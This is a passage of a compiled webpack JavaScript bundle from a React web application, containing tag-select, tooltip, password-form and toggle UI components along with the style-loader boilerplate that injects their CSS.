function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }








var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__TagSelect_styl___default.a);

var TAG_SELECT_OPTION_CLASS_NAME = 'tag-select-option';

var StyledCreatable = Object(__WEBPACK_IMPORTED_MODULE_3_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_1_react_select__["Creatable"]).withConfig({
  displayName: 'TagSelect__StyledCreatable',
  componentId: 'sc-1anmbyo-0'
})(['&&{.Select-control{background-color:', ';}.', '{background-color:', ';color:', ';&:hover{background-color:', ';}}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SURFACE.hex;
}, TAG_SELECT_OPTION_CLASS_NAME, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.SURFACE_LIGHTER.hex;
});

var TagSelect = function (_React$Component) {
  _inherits(TagSelect, _React$Component);

  function TagSelect() {
    var _ref5;

    var _temp, _this, _ret;

    _classCallCheck(this, TagSelect);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref5 = TagSelect.__proto__ || Object.getPrototypeOf(TagSelect)).call.apply(_ref5, [this].concat(args))), _this), _this.state = { options: _this.props.options }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(TagSelect, [{
    key: 'componentWillReceiveProps',


    /* Continue to update state with new options as options change
     * (e.g. by being selected) */
    value: function componentWillReceiveProps(_ref6) {
      var options = _ref6.options;

      this.setState({ options: options });
    }

    // NOTE: Very odd, but it seems the Creatable component requires the options
    // array passed to it to be mutable. Of course, it is a mutable array,
    // however, the parent component in our codebase usually renders using an
    // immutable object it converts into an array. I beleive this is why we
    // couldn't simply pass in our own arrays and have it work. As such, options
    // is kept in state so that the Creatable component can add to it as
    // necessary.

  }, {
    key: 'render',
    value: function render() {
      var _props = this.props,
          onChange = _props.onChange,
          className = _props.className,
          value = _props.value,
          inline = _props.inline,
          cyId = _props.cyId,
          props = _objectWithoutProperties(_props, ['onChange', 'className', 'value', 'inline', 'cyId']);

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledCreatable, _extends({}, props, {
        'data-cy': cyId,
        className: cx(className, { inline: inline }),
        value: value,
        onChange: onChange,
        noResultsText: 'No tags found',
        options: this.state.options,
        optionClassName: TAG_SELECT_OPTION_CLASS_NAME
      }));
    }
  }]);

  return TagSelect;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);
TagSelect.defaultProps = {
  inline: false
};

/***/ }),
/* 3578 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3579);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TagSelect.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TagSelect.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3579 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "", ""]);

// exports


/***/ }),
/* 3580 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Tooltip; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return TooltipWrap; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_portal__ = __webpack_require__(410);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_portal___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_portal__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__Tooltip_styl__ = __webpack_require__(3581);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__Tooltip_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3__Tooltip_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/* eslint-disable react/no-string-refs */





var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_3__Tooltip_styl___default.a);

var TooltipBody = function (_React$Component) {
  _inherits(TooltipBody, _React$Component);

  function TooltipBody() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, TooltipBody);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = TooltipBody.__proto__ || Object.getPrototypeOf(TooltipBody)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      height: 0
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(TooltipBody, [{
    key: 'componentDidMount',


    /**
     * We need the component to be mounted before we get its rendered height so we
     * call setState immediately after mount. This is considered an anti-pattern,
     * but given the circumstances there is no way to get the height (which we
     * need) before the component has been rendered to the dom.
     */
    value: function componentDidMount() {
      this.setState({ height: this.refs.main.offsetHeight }); // eslint-disable-line react/no-did-mount-set-state
    }
  }, {
    key: 'render',
    value: function render() {
      var height = this.state.height;

      var opacity = this.props.isOpen ? 1 : 0;
      var visibility = height ? 'visible' : 'hidden';
      var minWidth = this.props.minWidth;

      var top = this.props.top - height - this.props.topAdjust;
      var left = this.props.left;

      // Don't let the box hit the right edge of the screen. Also provide 10px of
      // space beteween the box and the edge of the screen

      if (window.innerWidth - left <= minWidth) left = left - minWidth - 10;

      // Don't let the tooltip go off screen to the top.
      if (top - height < 0) top = top + height + 30; // 30 just seemed to work...

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          onMouseLeave: this.props.onMouseLeave,
          style: { minWidth: minWidth },
          className: cx('TooltipBody') },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          {
            ref: 'main',
            style: {
              opacity: opacity,
              top: top,
              left: left,
              visibility: visibility
            },
            className: cx('tooltipBody') },
          this.props.children
        )
      );
    }
  }]);

  return TooltipBody;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

TooltipBody.defaultProps = {
  topAdjust: 10
};


/**
 * NOTE: This used pure render mixing before we converted it to use class
 * syntax.
 */
var Tooltip = function (_React$Component2) {
  _inherits(Tooltip, _React$Component2);

  function Tooltip() {
    var _ref2;

    var _temp2, _this2, _ret2;

    _classCallCheck(this, Tooltip);

    for (var _len2 = arguments.length, args = Array(_len2), _key2 = 0; _key2 < _len2; _key2++) {
      args[_key2] = arguments[_key2];
    }

    return _ret2 = (_temp2 = (_this2 = _possibleConstructorReturn(this, (_ref2 = Tooltip.__proto__ || Object.getPrototypeOf(Tooltip)).call.apply(_ref2, [this].concat(args))), _this2), _this2.state = {
      isOpen: false,
      cache: null,
      top: 0,
      left: 0,
      bottom: 0,
      right: 0
    }, _this2.getBoundingRect = function () {
      var cache = _this2.state.cache;

      // If caching is enabled and we have the cache simply return it

      if (cache && !_this2.props.recalculateOnHover) return cache;

      var _this2$refs$icon$getB = _this2.refs.icon.getBoundingClientRect(),
          top = _this2$refs$icon$getB.top,
          left = _this2$refs$icon$getB.left,
          bottom = _this2$refs$icon$getB.bottom,
          right = _this2$refs$icon$getB.right;

      var result = { top: top, left: left, bottom: bottom, right: right };

      if (!cache) _this2.setState({ cache: result });

      return result;
    }, _this2.handleMouseEnter = function () {
      var _this2$getBoundingRec = _this2.getBoundingRect(),
          top = _this2$getBoundingRec.top,
          left = _this2$getBoundingRec.left,
          bottom = _this2$getBoundingRec.bottom,
          right = _this2$getBoundingRec.right;

      _this2.setState({
        top: top,
        left: left,
        bottom: bottom,
        right: right,
        isOpen: true
      });
    }, _this2.handleMouseLeave = function () {
      _this2.setState({ isOpen: false });
    }, _temp2), _possibleConstructorReturn(_this2, _ret2);
  }

  /**
   * This is essentially a momization of the getBoundingClientRect DOM method.
   * We don't want to be interacting with the DOM every time the user hovers
   * this component unless its explicitly necessary. That being if it's part of
   * a non-static layout. For example, for tooltips that are part of dropdowns
   * or other moving components its important to recalculate the position
   * whenever the users hovers, but for most tooltips this is unecessary.
   *
   * NOTE: We intentionally do NOT cache a reference to the DOMRect object. We
   * only cache the numeric values that are of interest to us.
   *
   * @return {object}
   */


  _createClass(Tooltip, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          onMouseLeave: this.handleMouseLeave,
          style: this.props.style,
          className: cx('Tooltip', this.props.className) },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { className: cx('tooltipLabel') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', {
            ref: 'icon',
            onMouseEnter: this.handleMouseEnter,
            className: 'fa fa-info-circle' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_1_react_portal___default.a,
          { isOpened: this.state.isOpen },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            TooltipBody,
            _extends({
              onMouseLeave: this.handleMouseLeave,
              minWidth: this.props.minWidth
            }, this.state),
            this.props.children
          )
        )
      );
    }
  }]);

  return Tooltip;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/**
 * TooltipWrap is slightly different than tooltip in that it is meant to wrap an
 * existing Element and will not create one for you.
 *
 * NOTE: This API is a bit questionable since it goes against the original
 * Tooltip API of the children beeing rendered as the tooltip itself. There is
 * also quite a bit of shared logic here so this would be a prime candidate for
 * refactoring in the future.
 *
 * Usage:
 * <TooltipWrap tooltip={<span>This is a tooltip</span>}>
 *   <i className='fa fa-home'></i>
 * </TooltipWrap>
 */

Tooltip.defaultProps = {
  minWidth: 200
};


var TooltipWrap = function (_React$Component3) {
  _inherits(TooltipWrap, _React$Component3);

  function TooltipWrap() {
    var _ref3;

    var _temp3, _this3, _ret3;

    _classCallCheck(this, TooltipWrap);

    for (var _len3 = arguments.length, args = Array(_len3), _key3 = 0; _key3 < _len3; _key3++) {
      args[_key3] = arguments[_key3];
    }

    return _ret3 = (_temp3 = (_this3 = _possibleConstructorReturn(this, (_ref3 = TooltipWrap.__proto__ || Object.getPrototypeOf(TooltipWrap)).call.apply(_ref3, [this].concat(args))), _this3), _this3.state = {
      isOpen: false,
      cache: null,
      top: 0,
      left: 0,
      bottom: 0,
      right: 0
    }, _this3.getBoundingRect = function () {
      var cache = _this3.state.cache;

      // If caching is enabled and we have the cache simply return it

      if (cache && !_this3.props.recalculateOnHover) return cache;

      var _this3$refs$target$ge = _this3.refs.target.getBoundingClientRect(),
          top = _this3$refs$target$ge.top,
          left = _this3$refs$target$ge.left,
          bottom = _this3$refs$target$ge.bottom,
          right = _this3$refs$target$ge.right;

      var result = { top: top, left: left, bottom: bottom, right: right };

      if (!cache) _this3.setState({ cache: result });

      return result;
    }, _this3.handleMouseEnter = function () {
      var _this3$getBoundingRec = _this3.getBoundingRect(),
          top = _this3$getBoundingRec.top,
          left = _this3$getBoundingRec.left,
          bottom = _this3$getBoundingRec.bottom,
          right = _this3$getBoundingRec.right;

      _this3.setState({
        top: top,
        left: left,
        bottom: bottom,
        right: right,
        isOpen: true
      });
    }, _this3.handleMouseLeave = function () {
      _this3.setState({ isOpen: false });
    }, _temp3), _possibleConstructorReturn(_this3, _ret3);
  }

  /**
   * This is essentially a momization of the getBoundingClientRect DOM method.
   * We don't want to be interacting with the DOM every time the user hovers
   * this component unless its explicitly necessary. That being if it's part of
   * a non-static layout. For example, for tooltips that are part of dropdowns
   * or other moving components its important to recalculate the position
   * whenever the users hovers, but for most tooltips this is unecessary.
   *
   * NOTE: We intentionally do NOT cache a reference to the DOMRect object. We
   * only cache the numeric values that are of interest to us.
   * @return {object}
   */


  _createClass(TooltipWrap, [{
    key: 'render',
    value: function render() {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          onMouseLeave: this.handleMouseLeave,
          style: this.props.style,
          className: cx('Tooltip', this.props.className) },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'span',
          { ref: 'target', onMouseEnter: this.handleMouseEnter },
          this.props.children && __WEBPACK_IMPORTED_MODULE_0_react___default.a.cloneElement(this.props.children)
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_1_react_portal___default.a,
          { isOpened: this.state.isOpen },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            TooltipBody,
            _extends({
              topAdjust: this.props.topAdjust,
              onMouseLeave: this.handleMouseLeave,
              minWidth: this.props.minWidth
            }, this.state),
            this.props.tooltip
          )
        )
      );
    }
  }]);

  return TooltipWrap;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);
TooltipWrap.defaultProps = {
  minWidth: 200
};

/***/ }),
/* 3581 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3582);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tooltip.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Tooltip.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3582 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".Tooltip__Tooltip__1Yidvf {\n  display: inline-block;\n}\n.Tooltip__tooltipBody__Oa1hc4 {\n  position: absolute;\n  background: #fff;\n  color: #4a4a4a;\n  border: 1px solid #ddd;\n  border-radius: 1px;\n  padding: 10px;\n  font-size: 12px;\n  z-index: 200;\n}\n.Tooltip__tooltipBody__Oa1hc4 .Tooltip__arrowRight__3cAlo4 {\n  top: 50%;\n  left: 0;\n  margin-top: -5px;\n  border-width: 5px 5px 5px 0;\n  border-right-color: #000;\n}\n.Tooltip__tooltipLabel__3BCX_r i {\n  margin-left: 10px;\n}\n.Tooltip__tooltipLabel__3BCX_r i:hover {\n  color: #183049;\n}\n.dark .Tooltip__tooltipLabel__3BCX_r span:hover,\n.dark .Tooltip__tooltipLabel__3BCX_r i:hover {\n  color: #fff;\n}\n", ""]);

// exports
exports.locals = {
	"Tooltip": "Tooltip__Tooltip__1Yidvf",
	"tooltipBody": "Tooltip__tooltipBody__Oa1hc4",
	"arrowRight": "Tooltip__arrowRight__3cAlo4",
	"tooltipLabel": "Tooltip__tooltipLabel__3BCX_r"
};

/***/ }),
/* 3583 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export PasswordForm */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl__ = __webpack_require__(3584);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__InputWithIcon_js__ = __webpack_require__(1473);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };






/**
 * A quick interop function to help move away from value link
 */
var convertValueLink = function convertValueLink(_ref) {
  var value = _ref.value,
      onChange = _ref.requestChange;
  return {
    value: value,
    onChange: onChange
  };
};

var PasswordForm = function PasswordForm(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'form',
    { onSubmit: props.onSubmit },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2__InputWithIcon_js__["a" /* InputWithIcon */], _extends({
      id: 'email',
      type: 'email',
      icon: 'fa-user',
      className: __WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl___default.a.InputWithIcon,
      placeholder: 'Email',
      name: 'email',
      disabled: true
    }, convertValueLink(props.linkState('email')))),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2__InputWithIcon_js__["a" /* InputWithIcon */], _extends({
      id: 'password',
      type: 'password',
      icon: 'fa-key',
      className: __WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl___default.a.InputWithIcon,
      placeholder: 'Password',
      name: 'password',
      disabled: props.loading || props.success
    }, convertValueLink(props.linkState('password')))),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2__InputWithIcon_js__["a" /* InputWithIcon */], _extends({
      id: 'passwordConfirm',
      type: 'password',
      icon: 'fa-key',
      placeholder: 'Confirm Password',
      name: 'passwordConfirm',
      disabled: props.loading || props.success
    }, convertValueLink(props.linkState('passwordConfirm')))),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'p',
      { className: __WEBPACK_IMPORTED_MODULE_1__PasswordForm_styl___default.a.passwordDescription },
      'Passwords must be a minimum of 12 character from three of the following four categories: a-z, A-Z, 0-9, and non-alphabetic characters. (for example, !,$,#,%)'
    ),
    props.children
  );
};

/***/ }),
/* 3584 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3585);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PasswordForm.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PasswordForm.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3585 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".PasswordForm__InputWithIcon__1w5MZm {\n  margin-bottom: 10px;\n}\n.PasswordForm__InputWithIcon__1w5MZm:last-child {\n  margin-bottom: 0;\n}\n", ""]);

// exports
exports.locals = {
	"InputWithIcon": "PasswordForm__InputWithIcon__1w5MZm"
};

/***/ }),
/* 3586 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Toggle; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_toggle__ = __webpack_require__(1487);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_toggle___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_toggle__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_toggle_style_css__ = __webpack_require__(3593);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_toggle_style_css___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_toggle_style_css__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Toggle_styl__ = __webpack_require__(3594);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Toggle_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5__Toggle_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }









var cx = __WEBPACK_IMPORTED_MODULE_3_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_5__Toggle_styl___default.a);

// For the most part, the prop types are taken directly from react toggle source:
// https://github.com/instructure-react/react-toggle/blob/fb91f14dc6a31729275eeb8bb3ced42fd4f20a3f/index.es6.js#L14-L23
var Toggle = function (_React$Component) {
  _inherits(Toggle, _React$Component);

  function Toggle() {
    _classCallCheck(this, Toggle);

    return _possibleConstructorReturn(this, (Toggle.__proto__ || Object.getPrototypeOf(Toggle)).apply(this, arguments));
  }

  _createClass(Toggle, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          className = _props.className,
          disabled = _props.disabled,
          cyid = _props.cyid,
          label = _props.label,
          labelClassName = _props.labelClassName,
          id = _props.id,
          props = _objectWithoutProperties(_props, ['className', 'disabled', 'cyid', 'label', 'labelClassName', 'id']);
      // Remove, if present, meta property from Redux Form before React complains


      if (props.meta) delete props.meta;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { className: cx('Toggle', { disabled: disabled }, className) },
        label && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_components__["u" /* Label */],
          { className: cx('label', labelClassName, { clickable: !!id }), 'for': id },
          label
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_1_react_toggle___default.a, _extends({ 'data-cy': cyid || 'toggle', id: id }, props))
      );
    }
  }]);

  return Toggle;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3587 */,
/* 3588 */,
/* 3589 */,
/* 3590 */,
/* 3591 */,
/* 3592 */,
/* 3593 */
/***/ (function(module, exports) {

// removed by extract-text-webpack-plugin

/***/ }),
/* 3594 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3595);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Toggle.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Toggle.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3595 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
